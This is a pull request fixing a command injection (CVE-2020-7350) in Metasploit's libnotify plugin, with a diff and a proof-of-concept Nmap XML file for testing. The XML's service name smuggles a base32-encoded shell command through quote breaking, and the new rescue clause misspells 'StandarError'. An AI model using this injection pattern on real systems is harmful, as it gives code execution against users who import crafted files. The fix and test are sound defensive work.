### PR TITLE
Fix CVE-2020-7350 (command execution in libnotify)

### DIFF
--- a/plugins/libnotify.rb
+++ b/plugins/libnotify.rb
@@ -15,7 +15,7 @@ class Plugin::EventLibnotify < Msf::Plugin
     super
 
     @bin = opts[:bin] || opts['bin'] || `which notify-send`.chomp
-    @bin_opts = opts[:opts] || opts['opts'] || '-a Metasploit'
+    @bin_opts = opts[:opts] || opts['opts'] || '--app-name=Metasploit'
 
     raise 'libnotify not found' if @bin.empty?
 
@@ -24,7 +24,11 @@ class Plugin::EventLibnotify < Msf::Plugin
   end
 
   def notify_send(urgency, title, message)
-    system("#{@bin} #{@bin_opts} -u #{urgency} '#{title}' '#{message}'")
+    begin
+      system(@bin, @bin_opts, '-u', urgency, title, message)
+    rescue StandarError => e
+      puts "Error running #{@bin}: #{e.message}"
+    end
   end
 
   def on_session_open(session)


### PR DESCRIPTION
This fixes the vulnerability identified as CVE-2020-7350 as found, reported and fixed by @pastaoficial. 

The vulnerability exploits a command injection flaw within Metasploit's `libnotify` plugin. The flaw would be leveraged by an attacker enticing a user to open a specially crafted XML file (as generated using PR #13049). The result would be command execution within the context of the user who is running `msfconsole`.

# Testing
*With this change applied the module provided in PR #13049 should no longer function
- [ ] Start `msfconsole`
- [ ] `load libnotify`
- [ ] `db_import path/to/xml` (either use the module or the PoC from the appendix)
- [ ] **Do not** see a file "vulnerable" created in `/tmp` (the command run is `touch /tmp/vulnerable`)

## Appendix
PoC XML (runs `touch /tmp/vulnerable`)
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar  6 11:04:40 2020" version="7.60" xmloutputversion="1.04">
<host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="192.168.20.121" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c &quot;import os,base64;os.system(base64.b32decode(b'ORXXKY3IEAXXI3LQF53HK3DOMVZGCYTMMU======'.upper()))&quot;&amp;; printf '" method="table" conf="3"/></port>
</ports>
<times srtt="6174" rttvar="435" to="100000"/>
</host>
<runstats><finished time="1583503480" timestr="Fri Mar  6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar  6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>
```